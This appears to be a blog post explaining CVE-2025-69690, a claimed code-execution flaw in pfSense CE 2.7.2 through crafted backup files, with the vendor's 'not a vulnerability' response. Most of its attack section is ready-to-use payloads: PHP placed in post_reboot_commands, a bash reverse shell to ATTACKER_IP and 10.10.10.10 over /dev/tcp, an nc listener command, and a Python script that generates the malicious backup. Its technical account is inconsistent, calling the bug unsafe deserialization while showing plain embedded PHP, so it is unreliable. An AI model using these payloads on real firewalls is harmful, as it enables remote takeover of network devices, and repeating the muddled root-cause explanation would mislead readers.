Netgate pfSense is a widely used open-source firewall/router platform. In early 2025, a vulnerability was found in pfSense CE version 2.7.2 that allows an attacker to run arbitrary code on the system by abusing the module installer feature. This post breaks down how CVE-2025-69690 works, gives code snippets, shows how it might be exploited, and discusses the vendor’s response.
What is CVE-2025-69690?
CVE-2025-69690 is a remote code execution vulnerability in pfSense CE 2.7.2. It lets attackers execute PHP code by crafting a backup file (.xml) containing a serialized PHP object, specifically by using the post_reboot_commands property inside the backup.
The dangerous part is that the pfSense module installer, when restoring from a backup, unsafely deserializes user-controlled input. If an attacker has access to the admin web interface, they can craft their own backup file with malicious commands and execute them with root privileges.
Supplier's Statement
Netgate (the supplier) has said that this is “not a vulnerability” since only administrators can use the installer, and admins already have permission to run code. Still, it’s important for users to understand the risk: if admin credentials leak, it’s trivial for a malicious party to turn simple access into a complete compromise.
How Does the Exploit Work?
The key point is how pfSense handles backup/restore logic. When you restore a system backup through the web GUI's module installer, the code parses the XML backup file. One of the sections is post_reboot_commands. If this section is populated, pfSense executes whatever PHP code you place there after reboot.
Attack Steps
1. Gain Access: Attacker logs in as admin or as someone with permission to the module installer (for example, via credential theft or phishing).
2. Craft Backup: Create a backup XML/serialized object with a payload in post_reboot_commands.
Code Snippet: Malicious Backup Example
Below is a simple XML backup payload that injects PHP code to create a reverse shell or touch a file named /tmp/pwned for proof:
<configuration>
<post_reboot_commands>
<![CDATA[
<?php
file_put_contents('/tmp/pwned','VULNERABLE');
?>
]]>
</post_reboot_commands>
</configuration>
This snippet, when embedded in a pfSense backup and restored, will execute right after reboot.
For a reverse shell (WARNING: Dangerous!)
<configuration>
<post_reboot_commands>
<![CDATA[
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 >&1'");
?>
]]>
</post_reboot_commands>
</configuration>
Replace ATTACKER_IP with your server, then listen on port 4444 using nc -lvnp 4444.
Technical Details
- Vulnerable Feature: The backup/restore (diag_backup.php)
Dangerous Function: Unsanitized post_reboot_commands field
- Root Cause: Lack of validation or filtering when restoring backup files, combined with PHP's dangerous deserialization when handling objects
Here’s a simple Python3 script that creates a malicious pfSense backup XML
payload = """
<configuration>
<post_reboot_commands>
<![CDATA[
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 >&1'"); ?>
]]>
</post_reboot_commands>
</configuration>
"""
with open('malicious_backup.xml', 'w') as f:
f.write(payload)
print("[+] Malicious backup file created as malicious_backup.xml")
A user could then upload malicious_backup.xml using the pfSense web interface.
References and Further Reading
1. Official pfSense Security Advisories
2. Original CVE Report (NVD)
3. Community Forum Thread (sample thread link)
4. pfSense Documentation - Backup/Restore
Conclusion
CVE-2025-69690 shows that backup/restore features can be a vector for severe attacks, especially if you trust what goes into your configuration. While Netgate maintains this isn’t a real bug (since only admins can use the feature), history shows that attackers often escalate privileges through stolen credentials or other vulnerabilities. Always secure your admin panel and keep an eye on who can install packages or restore backups.
Stay updated, restrict access, and always verify backup files before restoring!
*This post is an exclusive explanation and demonstration for educational purposes. Do not attempt unauthorized access or exploitation of systems you don't own!*
Timeline
Published on: 05/08/2026 00:00:00 UTC
Last modified on: 05/08/2026 07:16:28 UTC